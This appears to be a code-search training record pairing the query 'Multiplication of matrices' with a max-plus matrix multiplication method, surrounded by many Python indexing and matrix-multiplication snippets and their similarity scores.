"def __getitem__(self, inds):\n i, j = inds\n return self.array[i][j]", "def item(self) -> Tuple[Scalar, ...]:\n return self._psdf.head(2)._to_internal_pandas().index.item()", "def __getitem__(self, rc):\r\n row, col = rc\r\n index = self.row_column_to_index(row, col)\r\n return self.values[index]", "def __getitem__(self, index):\n return self.array[index]", "def __getitem__(self, item):", "def __getitem__(self, idx):\n return self.items[idx]", "def __getitem__(self, j):\n\t\treturn self._coords[j]", "def get_elem (A, i, j):\n\treturn A[j][i]", "def __call__(self, pos):\n return self.__getitem__(pos)", "def __call__(self, pos):\n return self.__getitem__(pos)", "def __getitem__(self,index):\n return self._data[index[0]][index[1]]", "def __getitem__(self,i):\n return self._items[i]", "def __getitem__(self, item) -> NumericalAttribute:\n return self._item_dict[item]", "def __getitem__(self, idx):\n return self.data.iloc[idx]", "def __getitem__(self, args):\n return self.tabel[args]", "def __getitem__(self, index):\n return self.dataset[index]", "def get_matrix(self):\n return self._matrix[:3, :]", "def __getitem__(self, index):\n return self.cellData[index]", "def get_item(self, items, y, x):\n if self.maze[y][x] != \" \" and self.maze[y][x] in items:\n return self.maze[y][x]\n else:\n return None", "def __getitem__(self, item) -> Union[MoleculeDatapoint, List[MoleculeDatapoint]]:\n return self.data[item]", "def __getitem__(self, node):\n\n return self.adj_list[node]", "def __getitem__(self, item):\r\n return self.select(item)", "def __getitem__ ( self , index ):\n\t\treturn self . data [ index ]", "def __getitem__(self, item):\n pass", "def __getitem__(self, item):\n pass", "def __getitem__(self, item):\n return self.default_dataset[item]", "def __getitem__(self, key):\n if self.expr_list: return self.expr_list[key]\n else:\n if key < 0: key += len(self)\n if self.expr_tensor is not None:\n return torch.index_select(self.expr_tensor, dim=1, index=torch.LongTensor([key]).to(xnmt.device)).squeeze(1)\n else:\n return torch.index_select(self.expr_transposed_tensor, dim=-1, index=torch.LongTensor([key]).to(xnmt.device)).squeeze(-1)", "def get_stain_matrix(I):", "def __getitem__(self, x):\n return self.data[self.name][x]", "def __getitem__(self, key):\n if self.expr_list: return self.expr_list[key]\n else:\n if key < 0: key += len(self)\n if self.expr_tensor:\n return dy.pick(self.expr_tensor, key, dim=len(self.expr_tensor.dim()[0])-1)\n else:\n return dy.pick(self.expr_transposed_tensor, key, dim=0)", "def get_tile(self, point):\n print \"Getting tile for %s\" % repr(point)\n return self.matrix[point.y][point.x]", "def get_map_item(self, idx, col=0, absolute=False):\n\n return self.itemDataMap[self.itemIndexMap[idx] if not absolute else idx][self.get_real_col(col)]", "def __getitem__(self, i):\n return self.data[i]", "def __getitem__(self, x):\n return self.query(x)", "def get_tile(self, row, col):\r\n # replace with your code\r\n return self._cells[row][col]", "def get_item(self):\n raise NotImplementedError", "def __getitem__(self, keep):\n return self.get([self], keep)[0]", "def __getitem__(self, rq):\n return self._data[rq]", "def __getitem__(self, *args):\n return _osgAnimation.vectorMatrixKeyframe___getitem__(self, *args)" ]
[ "0.75138944", "0.7311626", "0.7112711", "0.7027379", "0.69761306", "0.68627983", "0.6828977", "0.6801616", "0.67811024", "0.6719613", "0.6719613", "0.6719613", "0.6648522", "0.6594458", "0.6576159", "0.65010285", "0.64954424", "0.6479522", "0.6468668", "0.6449649", "0.6440751", "0.6394753", "0.6376016", "0.63435096", "0.6336273", "0.63342947", "0.63190305", "0.62635773", "0.62488973", "0.62280035", "0.6220941", "0.62119496", "0.62093467", "0.6203135", "0.6181611", "0.61763054", "0.61631024", "0.61514103", "0.61514103", "0.61514103", "0.61499727", "0.6145736", "0.61297566", "0.61295646", "0.61290073", "0.6124381", "0.610882", "0.60986596", "0.6083407", "0.608233", "0.60788774", "0.6075778", "0.60738254", "0.60738254", "0.6070422", "0.60656", "0.6065153", "0.60554224", "0.6051583", "0.6036876", "0.6028241", "0.60198665", "0.6015904", "0.60121596", "0.6010473", "0.60100436", "0.6008482", "0.60056436", "0.59932125", "0.59928143", "0.59928143", "0.59911394", "0.5987451", "0.59829736", "0.59809536", "0.59658206", "0.59635574", "0.5947133", "0.5937196", "0.5934427", "0.59309196", "0.5925652", "0.59209585", "0.59205997", "0.5916795", "0.5916795", "0.59142846", "0.5911844", "0.59108776", "0.5906915", "0.5897352", "0.58968437", "0.58915883", "0.5891361", "0.5889527", "0.58849245", "0.5879714", "0.5876176", "0.58736414", "0.5869378" ]
0.61327946
42
r""" Multiplication of matrices
def __mul__(self, other): if type(self) != type(other) and \ not isinstance(self, SymbolicMaxPlusMatrix) and \ not isinstance(other, SymbolicMaxPlusMatrix): raise TypeError("can not multiply {} with {}".format(type(self),type(other))) if self._d != other._d: raise TypeError("dimension or number of variable mismatch") d = self._d new_data = [[None]*d for _ in range(d)] for i in range(d): for j in range(d): vertices = set() for k in range(d): l = [x+y for x in self[i,k] for y in other[k,j]] for v in l: v.set_immutable() vertices.update(l) new_data[i][j] = self.convex_hull(vertices) return SymbolicMaxPlusMatrix(d, self._nvars, tuple(new_data), self.convex_hull)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def matrix_mult(m1, m2):\n pass", "def Multiply(M1,M2):\r\n M3=[]\r\n w=0\r\n while w<len(M2[0]):\r\n tap=[]\r\n t=0\r\n while t<len(M2):\r\n tap.append(M2[t][w])\r\n t=t+1\r\n M3.append(tap)\r\n w=w+1\r\n M=[]\r\n # Multiplying matrices\r\n k=0\r\n sums=0\r\n while k<len(M1):\r\n j=0\r\n mpy=[]\r\n while j<len(M3):\r\n p=0\r\n sums=0\r\n while p<len(M3[j]):\r\n temp = (M1[k][p])*(M3[j][p])\r\n sums=sums+temp\r\n p=p+1\r\n mpy.append(sums)\r\n j=j+1\r\n M.append(mpy)\r\n k=k+1\r\n return M", "def multiply_matrices(a, b):\n try:\n x = len(b[0])\n except:\n b = make_2D(b)\n try:\n x = len(a[0])\n except:\n a = make_2D(a)\n if len(a[0]) != len(b):\n print 'error: matrices cannot be multiplied'\n return\n out = np.zeros((len(a), len(b[0])))\n for i in range(len(out)):\n for j in range(len(out[0])):\n sum = 0\n for k in range(len(a[i])):\n sum += a[i][k] * b[k][j]\n out[i][j] = sum\n return out", "def mul(self,mat1,mat2):\n if(isinstance(mat2,int)==True):\n result = [[mat1[i][j] * mat2 for j in range(len(mat1[0]))] for i in range(len(mat1))]\n self.out = result\n return self.out\n elif(len(mat1[0])==len(mat2)):\n result = [[sum(a*b for a,b in zip(i,j)) for j in zip(*mat2)] for i in mat1]\n self.out = result\n return self.out", "def mat_mul(mat1, mat2):\n\n if len(mat1[0]) == len(mat2):\n\n mat2 = matrix_transpose(mat2)\n response = []\n\n for row in range(len(mat1)):\n response.append(\n [\n sum(dot_product(mat1[row], mat2[column]))\n for column in range(len(mat2))\n ]\n )\n\n return response\n\n else:\n return None", "def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret", "def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new", "def matrix_mult_matrix(matrix_a, matrix_b):\n m = len(matrix_a)\n n = len(matrix_b)\n result = []\n matrix_b_t = transpose_matrix(matrix_b)\n for i in xrange(m):\n row = []\n\tfor j in xrange(m):\n row.append(dot_product(matrix_a[i], matrix_b_t[j]))\n\tresult.append(row)\n return result", "def matmul(a, b):\n raise NotImplementedError", "def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)", "def multiply_matrices(list):\n # Section 1: Start matrix product using 1st matrix in list\n matrix_product = list[0]\n\n # Section 2: Loop thru list to create product\n for matrix in list[1:]:\n matrix_product = matrix_multiply(matrix_product, matrix)\n\n return matrix_product", "def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)", "def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)", "def mat_mul(mat1, mat2):\n\n rows1 = len(mat1)\n cols1 = len(mat1[0])\n rows2 = len(mat2)\n cols2 = len(mat2[0])\n\n if cols1 != rows2:\n return None\n else:\n new_matrix = []\n for x in range(rows1):\n aux_row = []\n for y in range(cols2):\n aux_sum = []\n for z in range(cols1):\n aux_sum.append(mat1[x][z] * mat2[z][y])\n aux_row.append(sum(aux_sum))\n new_matrix.append(aux_row)\n\n return new_matrix", "def __mul__(self, other):\n # \n # TODO - your code here\n #\n \n result = [];\n row_result = [];\n product = 0;\n \n if(self.w != other.h):\n raise(ValueError, \"Matrices can not multiply for their dimesion doesn't match\"); \n \n for row in self.g:\n row_result = [];\n for j in range(other.w):\n product = dot_product(row,other.get_column(j));\n row_result.append(product);\n result.append(row_result);\n \n return Matrix(result);", "def matrix_mult(m1, m2):\n output = []\n for rowIndex, row in enumerate(m1): #go through rows in m1\n new_row = []\n for columnIndex in range(len(m2[0])): #go through indices for each column of m2\n sum = 0\n for index3 in range(len(row)):\n product = m1[rowIndex][index3] * m2[index3][columnIndex]\n sum += product\n new_row.append(sum)\n output.append(new_row)\n return output\n \n \n #output = []\n #first for loop corresponds to the rows of my output matrix and loops through the rows of m1 (enumerate)\n #create an empty new row\n # second for loop, loops through columns of m2\n # create sum variable, initialize it with zero\n # third for loop, multiplies the index of the row in m1 times the index of the column in m2\n # add sum to product and assign this to the sum variable\n # append sum to new row\n # append new row to output\n # return output", "def __mul__(self, other):\n if self.n != other.m:\n raise TypeError(\"Illegal dimensions for mul operator\")\n tmp = [[0 for _ in xrange(self.n)] for _ in xrange(other.m)]\n for i in xrange(self.n):\n for j in xrange(other.m):\n for k in xrange(other.n):\n tmp[i][j] += self.values[i][k] * other.values[k][j]\n res = []\n for i in tmp:\n res += i\n return simplematrix(self.n, other.m, res)", "def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp", "def matrixMul(self, matrix, matrix2):\n matrix0 = matrix[:]\n matrix[0] = matrix0[0] * matrix2[0] + matrix0[2]*matrix2[1] # + matrix0[4]*0\n matrix[1] = matrix0[1] * matrix2[0] + matrix0[3]*matrix2[1] # + matrix0[5]*0\n matrix[2] = matrix0[0] * matrix2[2] + matrix0[2]*matrix2[3] # + matrix0[4]*0\n matrix[3] = matrix0[1] * matrix2[2] + matrix0[3]*matrix2[3] # + matrix0[5]*0\n matrix[4] = matrix0[0] * matrix2[4] + matrix0[2]*matrix2[5] + matrix0[4]\n matrix[5] = matrix0[1] * matrix2[4] + matrix0[3]*matrix2[5] + matrix0[5]", "def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))", "def multiM(*args):\r\n filas_1,filas_2 = len(args[0]),len(args[1])\r\n columnas_1,columnas_2 = len(args[0][0]),len(args[1][0])\r\n matriz_r = []\r\n for k in range(filas_1):\r\n matriz_r.append([0]*columnas_2)\r\n for i in range(columnas_2):\r\n matriz_r[k][i] = 0\r\n for i in range(filas_1):\r\n for j in range(columnas_1):\r\n for k in range(columnas_2):\r\n matriz_r[i][k] = matriz_r[i][k] + args[0][i][j] * args[1][j][k]\r\n return matriz_r", "def matrixMultiply(a, colsA, b, colsB):\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r", "def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here", "def matrix_mul(m_a, m_b):\n rows_a = 0\n cols_a = 0\n rows_b = 0\n cols_b = 0\n if type(m_a) is not list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) is not list:\n raise TypeError(\"m_b must be a list\")\n length = []\n for row in m_a:\n if type(row) is not list:\n raise TypeError(\"m_a must be a list of lists\")\n for row in m_b:\n if type(row) is not list:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for row in m_a:\n cols_a = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_a should contain only integers or floats\")\n cols_a += 1\n for row in m_b:\n cols_b = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_b should contain only integers or floats\")\n cols_b += 1\n for row in m_a:\n length.append(len(row))\n rows_a += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_a must be of the same size\")\n length.clear()\n for row in m_b:\n length.append(len(row))\n rows_b += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_b must be of the same size\")\n if cols_a != rows_b:\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new = [[0 for i in range(cols_b)] for j in range(rows_a)]\n for new_rows in range(rows_a):\n for new_cols in range(cols_b):\n for i in range(cols_a):\n new[new_rows][new_cols] += m_a[new_rows][i] * m_b[i][new_cols]\n return new", "def mmultiply(self, matrix):\n try:\n result_matrix = [[0 for row in range(len(self.matrix))] for col in range(len(matrix[0]))]\n for i in range(len(self.matrix)):\n for j in range(len(matrix[0])):\n for k in range(len(matrix)):\n result_matrix[i][j] += self.matrix[i][k] * matrix[k][j]\n self.matrix = result_matrix\n except IndexError:\n pass\n pass", "def np_matmul(mat1, mat2):\n return np.matmul(mat1, mat2)", "def matrix_multiply(m1, m2):\n\n\tproduct = numpy.matmul(m1, m2)\n\tif type(product) == numpy.int64:\n\t\treturn float(product)\n\telse:\n\t\tresult = list(product)\n\t\treturn result", "def matrix_mult(A,B):\n\n m = len(A)\n p = len(B)\n n = len(B[0])\n AB = []\n for i in range(m):\n AB.append([])\n for j in range(n):\n total = 0\n for k in range(p):\n total += A[i][k] * B[k][j]\n AB[i].append(total)\n return AB", "def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)", "def matrixMultiplication(firstMatrix, secondMatrix):\n if len(firstMatrix[0]) == len(secondMatrix): # Checks whether the matrices can be multiplied or not or not\n finalMatrix = []\n for y in range(len(firstMatrix)): # 2\n currentMatrix = []\n for i in range(len(secondMatrix[0])):\n currentSum = 0\n for j in range(len(secondMatrix)):\n currentSum += secondMatrix[j][i] * firstMatrix[y][j]\n currentMatrix.append(currentSum)\n print(\"This is my current matrix: \" + str(currentMatrix))\n finalMatrix.append(currentMatrix)\n print(\"This product of the two matrices is :) \" + str(finalMatrix))\n else:\n print(\"This operation cannot be done, make sure the rows of the first matrix is the same as the number of columns in the second matrix\")", "def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C", "def matmul():\n\n if RESULT_IN_NVRAM:\n matrix_c = ResultMatrixInDaos()\n else:\n matrix_c = ResultMatrixInMemory()\n\n # This could be trivially optimized by reordering indexes\n # and caching either a_block or b_block (assuming C in-memory).\n # *However* it would result in unfair comparisons with the \n # previous implementation used elsewhere.\n # Using the naive algorithm makes sense for a raw comparison.\n for i in range(MATRIXSIZE):\n for j in range(MATRIXSIZE):\n partial_result_block = np.zeros((BLOCKSIZE, BLOCKSIZE))\n\n for k in range(MATRIXSIZE):\n a_block = np.fromstring(\n DAOS_KV[\"A%02d%02d\" % (i, k)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n b_block = np.fromstring(\n DAOS_KV[\"B%02d%02d\" % (k, j)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n partial_result_block += a_block @ b_block\n \n matrix_c[i,j] = partial_result_block\n\n return matrix_c", "def matrix_multiply(A,B):\n rowsA = len(A)\n colsA = len(A[0])\n\n rowsB = len(B)\n colsB = len(B[0])\n\n if colsA != rowsB:\n raise ArithmeticError('Number of A columns must equal number of B rows.')\n\n C = zeros_matrix(rowsA, colsB)\n\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)", "def matrixMultiplication(self, n, id, context):\n\n print(\"id: {}\".format(id))\n # Create one matrix\n f = 1\n m1 = []\n for x in range(n):\n row = []\n for y in range(n):\n row.append(f)\n f = f + 1\n m1.append(row)\n # The second matrix is equal to the first matrix\n m2 = m1\n print(\"m2: {}\".format(m2))\n\n # Multiply matrices\n m3 = []\n for i in range(n):\n row = []\n for j in range(n):\n sum = 0\n for k in range(n):\n sum = sum + m1[i][k] * m2[k][j]\n row.append(sum)\n m3.append(row)\n\n sum = 0\n # add the entries\n for i in range(n):\n for j in range(n):\n sum = sum + m3[i][j]\n\n print(\"Result of multiplication is {}\".format(sum))\n return sum", "def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if len(list(filter(lambda i: not isinstance(i, list), m_a))) > 0:\n raise TypeError(\"m_a must be a list of lists\")\n if len(list(filter(lambda i: not isinstance(i, list), m_b))) > 0:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a is None or m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b is None or m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for r in m_a:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_a should contain only integers or floats\")\n for r in m_b:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_b should contain only integers or floats\")\n if max(map(lambda i: len(i), m_a)) != min(map(lambda i: len(i), m_a)):\n raise TypeError(\"each row of m_a must be of the same size\")\n if max(map(lambda i: len(i), m_b)) != min(map(lambda i: len(i), m_b)):\n raise TypeError(\"each row of m_b must be of the same size\")\n try:\n w = (len(m_a) + (0, 1)[len(m_a) == 1])\n m_c = [(['x'] * w) for b in range(len(m_b[0]))]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n s = 0\n for k in range(len(m_a[0])):\n s += (m_a[i][k] * m_b[k][j])\n m_c[i][j] = s\n return list(filter(lambda r: r != (['x'] * w), m_c))\n except:\n raise ValueError(\"m_a and m_b can't be multiplied\")", "def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))", "def matrixMult( self, matrix0, matrix1 ):\r\n result = {}\r\n keys = sorted( set( matrix0.keys() ) )\r\n count = range( len( matrix0.keys() ) )\r\n \r\n for key in keys:\r\n result[ key ] = []\r\n for i in count:\r\n sum = 0\r\n for j in count:\r\n sum += matrix0[ key ][j] * matrix1[ keys[j] ][i]\r\n result[ key ].insert( i, sum )\r\n \r\n return result", "def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c", "def matmul(xs: List[List[float]],\n ys: List[List[float]]) -> List[List[float]]:\n product = []\n for x_row in range(len(xs)):\n row = []\n for y_col in range(len(ys[0])):\n col = [ys[y_row][y_col] for y_row in range(len(ys))]\n row.append(Math.dot(xs[x_row], col))\n product.append(row)\n return product", "def multiply_matrices(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A)\n colsA = len(A[0])\n rowsB = len(B)\n colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not all(isinstance(lst, list) for lst in m_a):\n raise TypeError(\"m_a must be a list of lists\")\n if not all(isinstance(lst, list) for lst in m_b):\n raise TypeError(\"m_b must be a list of lists\")\n if m_a in [[], [[]]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b in [[], [[]]]:\n raise ValueError(\"m_b can't be empty\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_a):\n raise TypeError(\"m_a should contain only integers or floats\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_b):\n raise TypeError(\"m_b should contain only integers or floats\")\n if not all(len(i) == len(m_a[0]) for i in m_a):\n raise TypeError(\"each row of m_a must be of the same size\")\n if not all(len(i) == len(m_b[0]) for i in m_b):\n raise TypeError(\"each row of m_b must be of the same size\")\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new_matrix = [[0 for i in m_b[0]] for j in m_a]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n for k in range(len(m_b)):\n new_matrix[i][j] += m_a[i][k] * m_b[k][j]\n return new_matrix", "def np_matmul(mat1, mat2):\n return mat1.dot(mat2)", "def matmul(x, y):\n return np.matmul(x, y)", "def MultiplyMatrix(matrixA, matrixB):\r\n # result matrix initialized as singularity matrix\r\n result = [[0 for y in range(len(matrixB[0]))] for x in range(len(matrixA))]\r\n for i in range(len(matrixA)):\r\n # iterate through columns of Y\r\n for j in range(len(matrixB[0])):\r\n # iterate through rows of Y\r\n for k in range(len(matrixB)):\r\n result[i][j] += matrixA[i][k] * matrixB[k][j]\r\n return result", "def _multi_matmul(arrays, order, i, j, constant=False) -> Tensor:\n if i == j:\n return arrays[i]\n else:\n return matmul(\n _multi_matmul(arrays, order, i, order[i, j], constant),\n _multi_matmul(arrays, order, order[i, j] + 1, j, constant),\n constant,\n )", "def __mul__(self, other):\r\n T = type(other)\r\n # mat4*scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x*other, self.mlist))\r\n # mat4*vec3\r\n if isinstance(other, _vec3):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n w = float(m41*other.x + m42*other.y + m43*other.z + m44)\r\n return _vec3(m11*other.x + m12*other.y + m13*other.z + m14, \r\n m21*other.x + m22*other.y + m23*other.z + m24, \r\n m31*other.x + m32*other.y + m33*other.z + m34)/w\r\n # mat4*vec4\r\n if isinstance(other, _vec4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n return _vec4(m11*other.x + m12*other.y + m13*other.z + m14*other.w, \r\n m21*other.x + m22*other.y + m23*other.z + m24*other.w, \r\n m31*other.x + m32*other.y + m33*other.z + m34*other.w,\r\n m41*other.x + m42*other.y + m43*other.z + m44*other.w)\r\n # mat4*mat4\r\n if isinstance(other, mat4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n n11,n12,n13,n14,n21,n22,n23,n24,n31,n32,n33,n34,n41,n42,n43,n44 = other.mlist\r\n return mat4( m11*n11+m12*n21+m13*n31+m14*n41,\r\n m11*n12+m12*n22+m13*n32+m14*n42,\r\n m11*n13+m12*n23+m13*n33+m14*n43,\r\n m11*n14+m12*n24+m13*n34+m14*n44,\r\n\r\n m21*n11+m22*n21+m23*n31+m24*n41,\r\n m21*n12+m22*n22+m23*n32+m24*n42,\r\n m21*n13+m22*n23+m23*n33+m24*n43,\r\n m21*n14+m22*n24+m23*n34+m24*n44,\r\n\r\n m31*n11+m32*n21+m33*n31+m34*n41,\r\n m31*n12+m32*n22+m33*n32+m34*n42,\r\n m31*n13+m32*n23+m33*n33+m34*n43,\r\n m31*n14+m32*n24+m33*n34+m34*n44,\r\n\r\n m41*n11+m42*n21+m43*n31+m44*n41,\r\n m41*n12+m42*n22+m43*n32+m44*n42,\r\n m41*n13+m42*n23+m43*n33+m44*n43,\r\n m41*n14+m42*n24+m43*n34+m44*n44)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for *\"", "def Mult(A, B, C_, IM, M):\n for i in range(M):\n for j in range(M):\n for k in range(M):\n C_[i, j] = A[i, j] * B[i, j]", "def matmul(A, B):\n\n A._check('*', B, A.shape[1], B.shape[0])\n return A.from_rep(A.rep.matmul(B.rep))", "def matrixMul(a, b):\n # Initializing Empty Matrix\n c = [[0, 0], [0, 0]]\n # 2x2 matrix multiplication. Essentially O(1)\n for i in range(2):\n for j in range(2):\n for k in range(2):\n c[i][j] = (c[i][j] + (a[i][k] * b[k][j]))\n\n # Returning the products\n return c", "def mult(m1, m2):\n assert np.shape(m1) == (2, 3)\n assert np.shape(m2) == (2, 3)\n\n m1_temp = np.vstack((m1, [0, 0, 1]))\n m2_temp = np.vstack((m2, [0, 0, 1]))\n result = m1_temp * m2_temp\n\n return result[:2, :]", "def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11", "def matrix_multiply(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A); colsA = len(A[0])\n rowsB = len(B); colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C", "def square_matrix_multiply(a, b):\n n = len(a)\n c = 